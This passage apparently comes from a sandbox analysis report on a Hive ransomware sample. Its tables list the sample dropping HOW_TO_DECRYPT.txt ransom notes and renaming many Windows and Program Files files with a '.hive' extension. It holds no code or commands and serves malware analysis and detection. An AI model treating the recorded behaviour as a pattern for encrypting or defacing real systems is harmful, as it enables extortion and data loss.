| File created | C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AW10BNB7\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\it-IT\Licenses\OEM\HomeBasicN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\de-DE\Licenses\eval\StarterE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\en-US\Licenses\_Default\EnterpriseN\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\SMI\Manifests\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\it-IT\Licenses\eval\HomeBasicE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\Licenses\_Default\Ultimate\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmc26a.inf_amd64_neutral_547edd894d7c19d9\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnkm004.inf_amd64_neutral_d2aee42dc9c393ea\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\Tasks\Microsoft\Windows\Windows Error Reporting\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\migwiz\dlmanifests\Microsoft-Windows-IasServer-MigPlugin\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmrock4.inf_amd64_neutral_e45293c539584293\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\SMI\Store\Machine\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\wbem\xml\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnlx00y.inf_amd64_neutral_977318f2317f5ddd\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\SysWOW64\config\TxR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kamchatka.-uYcD1toMB6z-bE3g_VWOSQIsO8IMhgF7aX1QOzV71k.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\video_filter\liberase_plugin.dll.-uYcD1toMB6z-bE3g_VWOXYURyTcJN8z4dP3lvbZulE.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01291_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200521.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\css\settings.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OUTLVBS.DLL | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Google\Update\1.3.36.151\psuser_64.dll.-uYcD1toMB6z-bE3g_VWOZdsFKYB17Nw4Hd7fllFEAk.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\it-IT\css\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US\msinfo32.exe.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\bin\policytool.exe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB1B.BDR | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Eirunepe | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\msdasql.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar.-uYcD1toMB6z-bE3g_VWOWYmM4bVA6goIhfl0etOVCg.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\ja\System.Data.Entity.Resources.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\RSSFeeds.html | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FS3BOX.POC | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jerusalem | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\MedianLetter.Dotx | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NEWS.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Easter | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\js\highDpiImageSwap.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04385_.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\sw\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_heb.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files\Java\jre7\bin\plugin2\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\ink\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\es-ES\DVDMaker.exe.mui | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152892.WMF | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena.-uYcD1toMB6z-bE3g_VWOejkriX1C3kBXs7XK-NDOTE.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\js\RSSFeeds.js | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libnormvol_plugin.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\SETUP.CHM | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPUNCT.XML | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\bin\instrument.dll.-uYcD1toMB6z-bE3g_VWOTM_qx8rQvwbv9OeH7Mlaxw.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\video_filter\libcanvas_plugin.dll | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Program Files (x86)\Windows Media Player\Network Sharing\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Faculty.accdt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\css\settings.css | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\video_filter\libscene_plugin.dll.-uYcD1toMB6z-bE3g_VWOZckA1cwiKxC3-vmLcM_dxA.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Branding\Basebrd\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\assembly\GAC_MSIL\MiguiControls\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\770a605d5193c730225204fa780278ae\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_server-help-chm.mmc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_6fe1f4a7f8512ee9\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-dskquota.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_a35ddd3ab3e846e1\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-feedback-service_31bf3856ad364e35_6.1.7600.16385_none_d5c0e508aa96a650\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-help-netvsta.resources_31bf3856ad364e35_6.1.7600.16385_it-it_8e2308b4c72ddb0e\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-btpanui-mui.resources_31bf3856ad364e35_6.1.7600.16385_it-it_742ca32d0094a20a\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_prnhp005.inf.resources_31bf3856ad364e35_6.1.7600.16385_en-us_89c102ed2ea8f023\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-d..utoenroll.resources_31bf3856ad364e35_6.1.7600.16385_it-it_47b8ac96851475dc\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-scripting.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_2d85ca15abc04414\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_netnvma.inf.resources_31bf3856ad364e35_6.1.7600.16385_it-it_5cd47ea41c470020\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-servicereportingapi_31bf3856ad364e35_6.1.7600.16385_none_6c7678cbda7098f8\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-i..l-keyboard-0000042c_31bf3856ad364e35_6.1.7600.16385_none_59634f5e6fa7d5d1\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-ie-feedsbs.resources_31bf3856ad364e35_8.0.7600.16385_ja-jp_edf96fb1262f5b5c\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_netfx35linq-system....dynamicdata.design_31bf3856ad364e35_6.1.7601.17514_none_f48e45c7055224f8\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\inf\.NET CLR Networking 4.0.0.0\000D\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\msil_microsoft.iis.power...provider.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_8f36c53b01dec296\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-mfdvdec_31bf3856ad364e35_6.1.7600.16385_none_64a6ece3617cfb74\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-r..lperclass.resources_31bf3856ad364e35_6.1.7600.16385_it-it_56ef5165204df522\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\msil_msbuild.resources_b03f5f7f11d50a3a_3.5.7600.16385_ja-jp_586fdad8bd134e99\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_netfx-sbs_sys_data_dll_31bf3856ad364e35_6.1.7600.16385_none_fe6017304e1a4816\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\assembly\GAC_MSIL\System.XML.resources\2.0.0.0_es_b77a5c561934e089\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-ndisuio.resources_31bf3856ad364e35_6.1.7600.16385_es-es_f8133cc8594b3790\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_wcf-m_smsvchost_perf_c_ini_31bf3856ad364e35_6.1.7600.16385_none_902b82bc25e07ac6\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\msil_microsoft.grouppolicy.reporting_31bf3856ad364e35_6.1.7601.17514_none_4c14798809666596\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-blb-cli-main_31bf3856ad364e35_6.1.7600.16385_none_a749cec7a8b6bf08\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-help-mail.resources_31bf3856ad364e35_6.1.7600.16385_de-de_00ed58017fd687e8\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-shunimpl_31bf3856ad364e35_6.1.7601.17514_none_b3bc7baa4af52181\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-audio-mci_31bf3856ad364e35_6.1.7600.16385_none_1ce3af494d8b953d\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-ldap-client.resources_31bf3856ad364e35_6.1.7600.16385_de-de_32516987997ca2b8\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-ieframe.resources_31bf3856ad364e35_8.0.7600.16385_es-es_0640ddf35e8847b1\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-l..epremiumn.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_bc8aa7bd88265509\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-netplwiz.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_2dd66c79c7e4f8e2\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\msil_system.data.oracleclient.resources_b77a5c561934e089_6.1.7600.16385_it-it_e8dad23a13148696\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-m..fications.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_8b669fa14daef0eb\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-class_ss.resources_31bf3856ad364e35_6.1.7600.16385_en-us_9c43114bf49ad2c9\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-i..l-keyboard-0001040e_31bf3856ad364e35_6.1.7600.16385_none_fd64cf5361a6c8d6\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-s..ty-syskey.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_47ae60c666d2a843\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\x86_microsoft-windows-i..tional-codepage-864_31bf3856ad364e35_6.1.7600.16385_none_cebf380cfc84b5bf\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\winsxs\amd64_microsoft-windows-b..trics-cpl.resources_31bf3856ad364e35_6.1.7600.16385_it-it_296d0df052df9526\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
